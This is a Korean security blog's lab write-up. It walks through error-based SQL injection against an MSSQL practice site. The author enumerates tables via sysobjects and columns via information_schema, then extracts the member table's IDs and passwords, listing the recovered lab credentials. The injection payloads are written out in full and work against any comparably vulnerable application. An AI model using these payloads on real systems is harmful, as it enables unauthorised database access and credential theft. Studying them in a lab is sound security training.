Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
Tags
- csrf
- sql injection
- NETSEC
- WAF
- docker
- Web Authentication
- AWS
- IDS
- VPC
- SQL
- Linux
- Blind SQL Injection
- Websec
- RDS
- Web
- Router Firewall
- arp
- VPN
- snmp
- ncloud
- stored procedure
- XSS
- HSRP
- Database Scheme
- wireshark
- 보안 솔루션
- Vlan
- DHCP
- UTM
- Mass SQL Injection
Archives
- Today
- Total
yuil :: SecOps
[WebSec] Database Scheme Lab 03 본문
camel 사이트 대상 database schema 파악하기
- table명 찾기
- 찾은 table 중 회원 정보가 들어 있는 table의 column 명 찾기
- 위에서 찾은 정보로 계정 정보(id, password) 알아내기
1. table명 찾기
'or (select top 1 name from (select top 1 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--





쭉 시도..
'or (select top 1 name from (select top 18 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--

2. member 테이블의 column명 찾기
'or (select top 1 column_name from (select top 1 column_name from information_schema.columns where table_name='member' order by column_name) as vtable order by column_name desc)>0--

'or (select top 1 column_name from (select top 2 column_name from information_schema.columns where table_name='member' order by column_name) as vtable order by column_name desc)>0--

쭉 시도..
'or (select top 1 column_name from (select top 5 column_name from information_schema.columns where table_name='member' order by column_name) as vtable order by column_name desc)>0--

'or (select top 1 column_name from (select top 8 column_name from information_schema.columns where table_name='member' order by column_name) as vtable order by column_name desc)>0--

3. 찾은 정보로 id/pw 알아내기
1) 첫 번째 계정 찾기
'or (select top 1 mem_id from member)>0--

'admin' id 탈취
'or (select top 1 mem_pwd from member where mem_id='admin')>0--

admin 계정의 비밀번호 'admin' 탈취
2) 두 번째 계정 찾기
'or (select top 1 mem_id from member where mem_id!='admin')>0--

'dltnstls' id 탈취
'or (select top 1 mem_pwd from member where mem_id='dltnstls')>0--

비밀번호 'wkdrns' 탈취
3) 세 번째 계정 찾기
'or (select top 1 mem_id from member where mem_id!='admin' and mem_id!='dltnstls')>0--

'hacker' id 탈취
'or (select mem_pwd from member where mem_id='hacker')>0--

비밀번호 'hacker' 탈취
계정 탈취 정보
admin / admin
dltnstls / wkdrns
hacker / hacker
로그인 테스트


계정 정보 탈취 성공
반응형
'실습 > Web Security 실습' 카테고리의 다른 글
| [WebSec] 오류 메시지 방어 기본 실습 (0) | 2025.10.22 |
|---|---|
| [WebSec] Database Scheme 실습 - Column (0) | 2025.10.22 |
| [WebSec] Database Scheme Lab 02 (0) | 2025.10.22 |
| [WebSec] Database Scheme 실습 - Table (0) | 2025.10.21 |
| [WebSec] Database Scheme Lab 01 (0) | 2025.10.21 |
